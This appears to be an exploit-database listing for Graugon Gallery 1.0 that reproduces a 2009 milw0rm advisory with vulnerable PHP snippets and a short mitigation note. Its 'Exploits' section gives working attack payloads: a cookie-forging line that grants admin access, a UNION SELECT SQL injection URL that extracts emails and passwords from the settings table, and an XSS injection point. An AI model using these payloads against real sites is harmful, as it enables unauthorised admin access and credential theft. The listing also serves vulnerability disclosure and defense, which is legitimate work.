header-logo
Suggest Exploit
vendor:
Graugon Gallery
by:
x0r
8.8
CVSS
HIGH
Sql Injection/ Insecure Cookie Handling/XSS
89, 79, 79, 79
CWE
Product Name: Graugon Gallery
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:graugon:graugon_gallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Graugon Gallery 1.0

Bugged file is /[path]/admin.php where an insecure cookie handling vulnerability exists. Bugged file is /[path]/view.php where a SQL injection vulnerability exists. Bugged file is /[path]/view.php where an XSS vulnerability exists.

Mitigation:

Ensure that user input is properly sanitized and validated. Use prepared statements to prevent SQL injection. Use a secure cookie handling mechanism.
Source

Exploit-DB raw data:

#########################################################################################
[0x01] Informations:

Name           : Graugon Gallery  1.0
Download       : http://www.hotscripts.com/jump.php?listing_id=87617&jump_type=1
Vulnerability  : Sql Injection/ Insecure Cookie Handling/XSS
Author         : x0r
Contact        : andry2000@hotmail.it
Notes          : Proud to be Italian 
#########################################################################################
[0x02] Bug:

Bugged file is /[path]/admin.php

[Code]
$TwoMonths = 60 * 60 * 24 * 60 + time(); 
setcookie(g_admin, 1, $TwoMonths);
[/code]

Bugged file is /[path]/view.php

[Code]

$id = $_GET['id'];
...

$query = "SELECT * FROM g_gallery WHERE id=$id";
$result = mysql_query($query);
[/code]

[Code]

$id = $_GET['id'];

echo "....<a href='view.php?id=" . $id . "'> "

[/code]


#########################################################################################
[0x03] Exploits:

Exploit: 1- javascript:document.cookie ="g_admin=1; path=/"
         2- http://victim.it/view.php?id=-1337 union select
0,0,0,concat(email,char(45),password(char45)),0,0 from g_settings--
		    ( change number of columns)
		 3- ?id=[XSSCODE]

########################################################################################

# milw0rm.com [2009-02-11]

Navigation

Suggest Exploit

Services By CQR